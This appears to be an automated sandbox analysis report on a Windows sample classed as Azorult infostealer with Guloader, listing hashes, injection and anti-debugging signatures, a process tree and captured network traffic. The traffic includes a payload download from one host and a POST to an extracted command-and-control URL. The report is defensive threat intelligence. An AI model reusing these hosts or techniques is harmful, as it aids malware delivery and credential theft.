Analysis
max time kernel: 53s
max time network: 59s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 19-11-2024 17:17
Static task: static1

Behavioral task: behavioral1
  Sample: 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  Resource: win7-20241010-en

Behavioral task: behavioral2
  Sample: 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  Resource: win10v2004-20241007-en

Behavioral task: behavioral3
  Sample: $PLUGINSDIR/System.dll
  Resource: win7-20241010-en

Behavioral task: behavioral4
  Sample: $PLUGINSDIR/System.dll
  Resource: win10v2004-20241007-en
General
Target: 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
Size: 543KB
MD5: e555bbbffc72df8a3b14eafd48f36bbc
SHA1: 322db6d82578f212e8fb18c7880e9f9de44580b4
SHA256: 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b
SHA512: a9ef31c67cc9e4c5c0ade06d37447978228e967139717b2201eb7acf67d17a5c556cc19927c8d5791b0022f8e3f259730cd85ae841806ef9f7e9234a113b0270
SSDEEP: 12288:32EI5cRYSzvuwIkyXS9bVVsKZIUvhnmd3ZhZw:3w6RfJIRIVaKZnmdPZw
Malware Config
Extracted: azorult
  http://mhlc.shop/GI341/index.php
Signatures
- Azorult
  An information stealer that was first discovered in 2016, targeting browsing history and passwords.
- Azorult family
- Guloader family
- Guloader, Cloudeye
  A shellcode based downloader first seen in 2020.
- Loads dropped DLL (1 IoC)
  pid   Process
  2548  27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  pid   Process
  2964  27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   Process
  2548  27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  2964  27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
- Suspicious use of SetThreadContext (1 IoC)
  description                          pid   procid_target  Process
  PID 2548 set thread context of 2964  2548  30             27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
- Drops file in Windows directory (1 IoC)
  description                   ioc                                                       Process
  File opened for modification  C:\Windows\resources\0409\slnger\barometerstandenes.san  27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
- Suspicious behavior: MapViewOfSection (1 IoC)
  pid   Process
  2548  27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description                       pid   procid_target  Process
  PID 2548 wrote to memory of 2964  2548  30             27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  PID 2548 wrote to memory of 2964  2548  30             27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  PID 2548 wrote to memory of 2964  2548  30             27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  PID 2548 wrote to memory of 2964  2548  30             27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  PID 2548 wrote to memory of 2964  2548  30             27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  PID 2548 wrote to memory of 2964  2548  30             27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe"
  PID: 2548
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe (child process)
    Command line: "C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe"
    PID: 2964
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
Network

DNS lookup via 8.8.8.8:53
  Request:  mertvinc.com.tr IN A
  Response: mertvinc.com.tr IN A 185.244.144.68

HTTP GET http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
Process: 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
Remote address: 185.244.144.68:80
Request:
GET /LAbxmTzNBCWjnKNdG58.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: mertvinc.com.tr
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 11 Nov 2024 12:17:10 GMT
Etag: "1c040-6731f5c6-3fa9fa73f7b85d5c;;;"
Accept-Ranges: bytes
Content-Length: 114752
Date: Tue, 19 Nov 2024 16:24:57 GMT
Server: LiteSpeed
X-Powered-By: PleskLin

DNS lookup via 8.8.8.8:53
  Request:  mhlc.shop IN A
  Response: mhlc.shop IN A 172.67.208.107
            mhlc.shop IN A 104.21.23.20

HTTP POST http://mhlc.shop/GI341/index.php
Process: 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
Remote address: 172.67.208.107:80
Request:
POST /GI341/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: mhlc.shop
Content-Length: 99
Cache-Control: no-cache
Response:
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nmm%2FxT3HWFYVQbLZJt6gMi2n4fHm63j%2B2pCGy%2F9%2FMuxK20HadSeVtv7ZyxEeehZ4I371y7RweCOnSgTLADT9h9b9LFQNHZ%2FRzsOMa8AK%2BCRVF%2FmWBa90q0%2FmPww%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e51dbfc38f3be3e-DUB

Traffic summary
- 185.244.144.68:80  http  http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
  Process: 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  Sent 2.4kB, received 118.6kB (48 packets sent, 88 received)
  HTTP Request: GET http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
  HTTP Response: 200
- 172.67.208.107:80  http  http://mhlc.shop/GI341/index.php
  Process: 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
  Sent 582 B, received 5.5kB (7 packets sent, 9 received)
  HTTP Request: POST http://mhlc.shop/GI341/index.php
  HTTP Response: 403
- DNS: sent 61 B, received 77 B (1 packet sent, 1 received)
  DNS Request: mertvinc.com.tr
  DNS Response: 185.244.144.68
- DNS: sent 55 B, received 87 B (1 packet sent, 1 received)
  DNS Request: mhlc.shop
  DNS Response: 172.67.208.107, 104.21.23.20
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 11KB
  MD5: 75ed96254fbf894e42058062b4b4f0d1
  SHA1: 996503f1383b49021eb3427bc28d13b5bbd11977
  SHA256: a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7
  SHA512: 58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4